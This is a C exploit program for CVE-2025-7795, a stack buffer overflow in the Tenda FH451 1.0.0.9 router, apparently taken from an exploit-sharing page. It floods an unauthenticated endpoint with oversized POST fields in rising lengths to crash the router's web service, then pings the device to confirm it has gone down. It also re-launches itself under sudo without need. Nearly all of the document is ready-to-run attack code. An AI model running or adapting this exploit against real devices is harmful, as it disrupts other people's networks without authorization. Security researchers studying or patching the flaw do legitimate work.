📄 Tenda FH451 1.0.0.9 Buffer Overflow

/*
     * Title : Tenda FH451 1.0.0.9 Router - Stack-based Buffer Overflow
     * Author        : Byte Reaper
     * Telegram      : @ByteReaper0
     * CVE           : CVE-2025-7795
     * Vulnerability : Buffer Overflow
     * Description   :
     *   A buffer overflow vulnerability affecting certain Tenda routers,
     *   exploitable via an unauthenticated POST request to an unprotected endpoint, leading to service crash.
     */
    
    #include <stdio.h>
    #include <string.h>
    #include <unistd.h>
    #include "argparse.h"
    #include <arpa/inet.h>
    #include <stdlib.h>
    #include <curl/curl.h>
    #include <sys/wait.h>
    
    #define FULL_URL 2500
    #define POST_DATA 10000
    
    const char *targetUrl = NULL;
    const char *targetip = NULL;
    int selectIp  = 0;
    int selectUrl  = 0;
    int verbose = 0;
    int showOne = 0;
    char postData[POST_DATA];
    
    struct Mem
    {
        char *buffer;
        size_t len;
    };
    
    size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata)
    {
        size_t total = size * nmemb;
        struct Mem *m = (struct Mem *)userdata;
        char *tmp = realloc(m->buffer, m->len + total + 1);
        if (!tmp) return 0;
        m->buffer = tmp;
        memcpy(&(m->buffer[m->len]), ptr, total);
        m->len += total;
        m->buffer[m->len] = '\0';
        return total;
    }
    
    void pingPacket()
    {
        int pid = fork();
        printf("\n============================================== [Ping] ==============================================\n");
        if (pid < 0)
        {
            perror("\e[1;31m[-] Fork Failed!\e[0m");
            exit(1);
        }
        if (pid == 0)
        {
            printf("\e[1;32m[+] Child Process (Ping) -> PID: %d\e[0m\n",
                   getpid());
            char *const argv[] = { "/bin/ping",
                "-c",
                "3",
                (char *)targetip,
                NULL };
                char *const envp[] = { NULL };
                __asm__ volatile
                (
                    "mov $59, %%rax\n\t"
                    "mov %[prog], %%rdi\n\t"
                    "mov %[argv], %%rsi\n\t"
                    "mov %[envp], %%rdx\n\t"
                    "syscall\n\t"
                    "mov $60, %%rax\n\t"
                    "xor %%rdi, %%rdi\n\t"
                    "syscall\n\t"
                    :
                    : [prog] "r" (argv[0]),
                 [argv] "r" (argv),
                 [envp] "r" (envp)
                 : "rax", "rdi", "rsi", "rdx"
                );
        }
        else
        {
            printf("\e[1;32m[+] Main PID : %d\e[0m\n",
                   getpid());
            int status;
            waitpid(pid,
                    &status,
                    0);
            if (WIFEXITED(status))
            {
                int code = WEXITSTATUS(status);
                printf("\e[1;33m[+] Ping exited with code: %d\e[0m\n",
                       code);
                if (code == 0)
                {
                    printf("\e[1;31m[-] Successfully confirmed connection via ping!\e[0m\n");
                    printf("\e[1;31m[-] The server is still working, please try again!\n\e[0m");
                }
                else
                {
                    printf("\e[1;34m[+] The server is not responding to the ping request!\e[0m\n");
                    printf("\e[1;34m[+] CVE-2025-7795: Vulnerability confirmed! Server is down.\e[0m\n");
                }
            }
        }
        printf("\n============================================================================================\e[0m\n");
    }
    
    void sendRequest()
    {
        CURL *c = curl_easy_init();
        CURLcode res;
        char full[FULL_URL];
        struct Mem response = {NULL, 0};
        if (!c) {
            printf("\e[1;31m[-] Error Create Object Curl !\e[0m\n");
            exit(EXIT_FAILURE);
        }
        if (targetip) selectIp = 1;
        if (targetUrl) selectUrl = 1;
        if (selectIp)
        {
            snprintf(full,
                     sizeof(full),
                     "http://%s/goform/fromP2pListFilter",
                     targetip);
        }
        if (selectUrl)
        {
            snprintf(full,
                     sizeof(full),
                     "%s/goform/fromP2pListFilter",
                     targetUrl);
        }
        int rounds = 5;
        int baseLen = 3500, step = 1000;
        showOne = 1;
        for (int i = 0; i < rounds; i++)
        {
            int len = baseLen + i * step;
            if (len + 6 >= sizeof(postData)) break;
            snprintf(postData, sizeof(postData), "list=");
            memset(postData + 5, 'A', len);
            postData[5 + len] = '\0';
            printf("\e[1;34m[%d] Iteration %d - Length: %d\e[0m\n",
                   i+1,
                   i+1,
                   len);
            if (verbose)
            {
                printf("\e[1;35m\n====================================================================[Post Data] ====================================================================\e[0m\n");
                printf("%s\e[0m\n\n", postData);
                printf("\e[1;35m====================================================================[Post Data] ====================================================================\e[0m\n");
            }
    
            curl_easy_reset(c);
            curl_easy_setopt(c,
                             CURLOPT_URL,
                             full);
            curl_easy_setopt(c,
                             CURLOPT_ACCEPT_ENCODING,
                             "");
            curl_easy_setopt(c,
                             CURLOPT_FOLLOWLOCATION,
                             1L);
            curl_easy_setopt(c,
                             CURLOPT_POST,
                             1L);
            curl_easy_setopt(c,
                             CURLOPT_POSTFIELDS,
                             postData);
            curl_easy_setopt(c,
                             CURLOPT_POSTFIELDSIZE,
                             (long)strlen(postData));
            curl_easy_setopt(c,
                             CURLOPT_WRITEFUNCTION,
                             write_cb);
            curl_easy_setopt(c,
                             CURLOPT_WRITEDATA,
                             &response);
            curl_easy_setopt(c,
                             CURLOPT_CONNECTTIMEOUT,
                             5L);
            curl_easy_setopt(c,
                             CURLOPT_TIMEOUT,
                             10L);
            curl_easy_setopt(c,
                             CURLOPT_SSL_VERIFYPEER,
                             0L);
            curl_easy_setopt(c,
                             CURLOPT_SSL_VERIFYHOST,
                             0L);
            struct curl_slist *h = NULL;
            h = curl_slist_append(h,
                                  "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
            h = curl_slist_append(h,
                                  "Accept-Encoding: gzip, deflate, br");
            h = curl_slist_append(h,
                                  "Accept-Language: en-US,en;q=0.5");
            h = curl_slist_append(h,
                                  "Connection: keep-alive");
            h = curl_slist_append(h,
                                  "Referer: http://example.com");
            h = curl_slist_append(h,
                                  "Cache-Control: no-cache");
            h = curl_slist_append(h,
                                  "Pragma: no-cache");
            curl_easy_setopt(c, CURLOPT_HTTPHEADER, h);
            if (verbose) curl_easy_setopt(c, CURLOPT_VERBOSE, 1L);
    
            char *encode1 = curl_easy_escape(c, full, 0);
            if (!encode1)
            {
                printf("\e[1;31m[-] URL encoding failed for payload\e[0m\n");
                exit(EXIT_FAILURE);
            }
            if (verbose && showOne)
            {
                printf("\e[1;37m=========================================");
                if (selectUrl) printf("\e[1;37m[+] Input Url : %s\e[0m\n[+] Encode Url : %s\e[0m\n[+] full format Url : %s\e[0m\n",
                    targetUrl,
                    encode1,
                    full);
                if (selectIp) printf("\e[1;37m[+] Input Ip : %s\e[0m\n[+] full format Url : %s\e[0m\n",
                    targetip,
                    full);
                printf("=========================================");
                showOne = 0;
            }
            res = curl_easy_perform(c);
            curl_slist_free_all(h);
            curl_free(encode1);
            if (response.buffer)
            {
                free(response.buffer);
                response.buffer = NULL;
                response.len = 0;
            }
            if (res == CURLE_OK)
            {
                long httpCode = 0;
                printf("\e[1;36m[+] Request sent successfully\e[0m\n");
                curl_easy_getinfo(c, CURLINFO_RESPONSE_CODE,
                                  &httpCode);
                printf("\e[1;32m[+] Http Code Response : %ld\e[0m\n",
                       httpCode);
                if (httpCode >= 200 && httpCode < 300)
                {
                    printf("\e[1;31m[-] The server was not affected, still working !\n");
                    printf("\e[1;33m-------------------------------- Response Server --------------------------------\e[0m\n");
                    printf("%s\e[0m\n",
                           response.buffer);
                    printf("\e[1;33m-----------------------------------------------------------------------------------\e[0m\n");
                }
                else
                {
                    printf("\e[1;34m[+] Negative server response. I started trying to confirm the connection...\e[0m\n");
                    printf("[+] Run Command Ping For Check Connection : \e[0m\n");
                    if (selectIp) pingPacket();
                    else printf("[-] Error Run Command Ping for URl !\e[0m\n[-] Please Enter Target Ip for Check Connection !\e[0m\n");
                }
            }
            else
            {
                printf("[-] Error Send Request, Please Check Your Connection !\e[0m\n");
                printf("[-] Error : %s\n", curl_easy_strerror(res));
            }
        }
        free(response.buffer);
        curl_easy_cleanup(c);
    }
    
    int main(int argc,
             const char **argv)
    {
        printf(
            "\e[1;31m"
            "▄▖▖▖▄▖  ▄▖▄▖▄▖▄▖  ▄▖▄▖▄▖▄▖ \n"
            "▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖ ▌ ▌▙▌▙▖ \n"
            "▙▖▚▘▙▖  ▙▖█▌▙▖▄▌   ▌ ▌▄▌▄▌ \n"
            "              \e[1;37mByte Reaper\e[0m\n"
        );
        printf("\e[1;37m---------------------------------------------------------------------------------------------------------------------------------\e[0m\n");
        if (getuid() != 0)
        {
            printf("===================================================\e[0m\n");
            printf("[-] Not running as root. Trying with sudo...\e[0m\n");
    
            char *args[] = {(char*)"sudo",
                (char*)"./exploit",
                NULL};
                execvp("sudo", args);
    
                perror("[-] Error Run Exploit in Root !");
                __asm__ volatile
                (
                    "mov $0x3C, %%rax\n\t"
                    "xor %%rdi, %%rdi\n\t"
                    "syscall\n\t"
                    :
                    :
                    : "rdi"
                );
        }
        printf("\e[1;36m[+] Running as root! Exploit continues...\e[0m\n");
        printf("===================================================\e[0m\n");
    
        struct argparse_option options[] =
        {
            OPT_HELP(),
            OPT_STRING('i',
                      "ip",
                       &targetip,
                       "Enter Target IP"),
            OPT_STRING('u',
                        "url",
                        &targetUrl,
                        "Enter Target URL"),
            OPT_BOOLEAN('v',
                        "verbose",
                        &verbose,
                        "Verbose Mode"),
            OPT_END(),
        };
    
        struct argparse argparse;
        argparse_init(&argparse,
                      options,
                      NULL,
                      0);
        argparse_parse(&argparse,
                       argc,
                       argv);
    
        if (!targetip && !targetUrl)
        {
            printf("\e[1;33m[-] Please Enter Target IP OR URl !\e[0m\n");
            printf("\e[1;33m[!] Exemple : ./exploit -u http://ROUTER_IP\e[0m\n");
            printf("[+] OR \n");
            printf("\e[1;33m[!] Exemple : ./exploit -i ROUTER_IP\e[0m\n");
            __asm__ volatile(
                "xor %%rdi, %%rdi\n\t"
                "mov $0x3C, %%rax\n\t"
                "1:\n\t"
                "syscall\n\t"
                :
                :
                : "rax", "rdi", "rsi"
            );
        }
        if (targetip && targetUrl)
        {
            printf("[+] Please Enter Traget URL OR Traget Ip address, Exit...\e[0m\n");
            __asm__ volatile
            (
                "mov $0x3C, %%rax\n\t"
                "xor %%rdi, %%rdi\n\t"
                "syscall\n\t"
                :
                :
                :"rdi"
            );
        }
        if (selectIp)
        {
            sendRequest();
        }
        else
        {
            sendRequest();
        }
    
    
        return 0;
    }